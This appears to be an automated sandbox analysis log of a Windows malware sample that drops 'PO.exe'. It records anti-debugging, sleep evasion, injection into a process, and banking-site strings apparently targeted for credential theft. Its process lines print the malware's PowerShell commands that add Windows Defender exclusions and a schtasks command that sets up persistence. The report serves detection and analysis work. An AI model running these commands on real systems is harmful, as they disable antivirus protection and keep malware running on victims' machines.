Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C7286D FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00C7286D
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C8CBE4 FindFirstFileExA,	0_2_00C8CBE4
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C7F3FB SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00C7F3FB

Source: C:\Users\user\Desktop\owKQ0b029a.exe

Code function: 0_2_00C816BE VirtualQuery,GetSystemInfo,

0_2_00C816BE

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe	Jump to behavior

Source: tmpF307.tmp.15.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: tmpF307.tmp.15.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: tmpF307.tmp.15.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: tmpF307.tmp.15.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: tmpF307.tmp.15.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: tmpF307.tmp.15.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: tmpF307.tmp.15.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: tmpF307.tmp.15.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: tmpF307.tmp.15.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: tmpF307.tmp.15.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: tmpF307.tmp.15.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: tmpF307.tmp.15.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: tmpF307.tmp.15.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: tmpF307.tmp.15.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: tmpF307.tmp.15.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: PO.exe, 0000000F.00000002.2263302210.000000000141F000.00000004.00000020.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2348376526.0000000001200000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tmpF307.tmp.15.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: tmpF307.tmp.15.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: tmpF307.tmp.15.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: tmpF307.tmp.15.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: tmpF307.tmp.15.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: tmpF307.tmp.15.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: tmpF307.tmp.15.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: tmpF307.tmp.15.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: tmpF307.tmp.15.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: tmpF307.tmp.15.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: tmpF307.tmp.15.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: owKQ0b029a.exe, 00000000.00000003.2162645092.00000000011DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\0
Source: tmpF307.tmp.15.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: tmpF307.tmp.15.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: QntRsaVyLKlY.exe, 00000011.00000002.2246709726.0000000006DB6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: tmpF307.tmp.15.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: tmpF307.tmp.15.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: tmpF307.tmp.15.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\owKQ0b029a.exe

API call chain: ExitProcess graph end node

graph_0-19183

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\owKQ0b029a.exe

Code function: 0_2_00C8A957 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00C8A957

Source: C:\Users\user\Desktop\owKQ0b029a.exe

Code function: 0_2_00C897B3 mov eax, dword ptr fs:[00000030h]

0_2_00C897B3

Source: C:\Users\user\Desktop\owKQ0b029a.exe

Code function: 0_2_00C8D895 GetProcessHeap,

0_2_00C8D895

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C8A957 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00C8A957
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C82AC7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00C82AC7
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C82655 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00C82655
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C827A3 SetUnhandledExceptionFilter,	0_2_00C827A3

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Memory written: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\owKQ0b029a.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpDEBA.tmp"
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process created: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"

Source: C:\Users\user\Desktop\owKQ0b029a.exe

Code function: 0_2_00C824AB cpuid

0_2_00C824AB

Source: C:\Users\user\Desktop\owKQ0b029a.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00C7E1A3

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
